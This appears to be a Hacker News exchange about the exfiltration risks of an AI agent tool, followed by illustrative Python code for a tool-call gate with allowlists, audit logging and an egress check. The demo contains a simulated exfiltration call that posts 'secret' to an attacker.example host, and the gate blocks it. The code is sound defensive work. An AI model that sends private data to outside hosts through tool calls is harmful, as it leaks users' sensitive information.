diffeomorphism, 3 days ago:
The post title should probably start with "Show HN:". What kind of security guarantees do you have? It seems to me that your "problem" usually is unanswered on purpose: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/ This has access to sensitive knowledge, tool use and exfiltration. So, the tech seems nice, but I doubt I could ever get permission to deploy this.
achushankar, 2 days ago (reply to parent):
Excellent point about the security concerns. You're right that the combination of:

- Sensitive knowledge access
- Tool use/actions
- Potential exfiltration

is a serious concern, especially in enterprise environments.

Currently, this has:

- Row-level security in Supabase
- API key auth
- Rate limiting

But it does NOT have:

- Comprehensive audit logging
- Fine-grained permission controls
- Tool execution sandboxing
- Data loss prevention

You're right that this shouldn't be deployed in production with sensitive data without significant security hardening. I should have been clearer about that. Thanks for the link to Simon's article - very relevant.

This is more suited for learning/experimentation than production use with sensitive data right now. If anyone wants to work on security features, I'd be happy to collaborate on that!
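As an added illustration of two of the controls the reply above lists as missing (fine-grained permission controls and audit logging), plus a coarse check on the exfiltration leg of the trifecta, here is a minimal tool-dispatch gate. This is example code written for this page, not code from the project being discussed; the names `Principal`, `ToolGate`, the sample tools and the `api.internal.example` / `attacker.example` hosts are all assumptions for illustration.

```python
"""Added example (not the project's code): a tool-call gate with a per-principal
allowlist, an append-only audit trail, and an egress host check. All names here
(Principal, ToolGate, sample tools, hostnames) are constructed for illustration."""
from __future__ import annotations

import json
import time
from dataclasses import dataclass, field
from typing import Any, Callable
from urllib.parse import urlparse


@dataclass(frozen=True)
class Principal:
    """Who is asking: an API-key holder with an explicit list of tools it may call."""
    name: str
    allowed_tools: frozenset[str]


@dataclass
class ToolGate:
    """Dispatches tool calls only when permitted, and records every decision."""
    tools: dict[str, Callable[..., Any]]
    egress_allowlist: frozenset[str]  # hosts a network tool may contact
    audit: list[dict[str, Any]] = field(default_factory=list)

    def _record(self, principal: Principal, tool: str, args: dict[str, Any],
                decision: str, reason: str) -> None:
        # Log every attempt, allowed or denied, so a reviewer sees what the
        # agent tried to do and not only what succeeded.
        self.audit.append({"ts": time.time(), "principal": principal.name,
                           "tool": tool, "args": json.loads(json.dumps(args)),
                           "decision": decision, "reason": reason})

    def call(self, principal: Principal, tool: str, **args: Any) -> Any:
        if tool not in self.tools:
            self._record(principal, tool, args, "deny", "unknown tool")
            raise PermissionError(f"unknown tool {tool!r}")
        if tool not in principal.allowed_tools:
            self._record(principal, tool, args, "deny", "tool not in allowlist")
            raise PermissionError(f"{principal.name} may not call {tool!r}")
        # Coarse exfiltration gate: any http(s) URL argument must point at an
        # allowlisted host. This is not DLP; it only blocks obvious egress.
        for value in args.values():
            if isinstance(value, str) and value.startswith(("http://", "https://")):
                host = urlparse(value).hostname or ""
                if host not in self.egress_allowlist:
                    self._record(principal, tool, args, "deny",
                                 f"egress to {host!r} not allowlisted")
                    raise PermissionError(f"egress to {host!r} blocked")
        self._record(principal, tool, args, "allow", "ok")
        return self.tools[tool](**args)


# Constructed sample tools: a retrieval tool over private data and a network tool.
def search_docs(query: str) -> list[str]:
    return [f"doc about {query}"]


def http_post(url: str, body: str) -> str:
    return f"would POST {len(body)} bytes to {url}"  # never actually sends


def build_gate() -> ToolGate:
    return ToolGate(tools={"search_docs": search_docs, "http_post": http_post},
                    egress_allowlist=frozenset({"api.internal.example"}))


READ_ONLY = Principal("reader-key", frozenset({"search_docs"}))
INTEGRATOR = Principal("integrator-key", frozenset({"search_docs", "http_post"}))


def demo() -> dict[str, Any]:
    """Exercise the cases a reviewer would ask about and return the outcomes."""
    gate = build_gate()
    out: dict[str, Any] = {"search": gate.call(READ_ONLY, "search_docs", query="quarterly")}
    try:  # read-only key tries a tool it was never granted
        gate.call(READ_ONLY, "http_post", url="https://api.internal.example/x", body="hi")
        out["reader_post"] = "allowed"
    except PermissionError:
        out["reader_post"] = "denied"
    try:  # permitted tool, but pointed at a host outside the allowlist
        gate.call(INTEGRATOR, "http_post", url="https://attacker.example/x", body="secret")
        out["exfil"] = "allowed"
    except PermissionError:
        out["exfil"] = "denied"
    out["ok_post"] = gate.call(INTEGRATOR, "http_post",
                               url="https://api.internal.example/x", body="hi")
    out["audit"] = gate.audit
    return out


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2, default=str))
```

The point of the audit list is that denials are recorded alongside successes: a prompt-injected attempt to post private data to an outside host shows up as a `deny` entry with the offending host, which is what an incident responder would want to find. Real sandboxing of tool execution and actual DLP on the payload are still out of scope here, as the reply says.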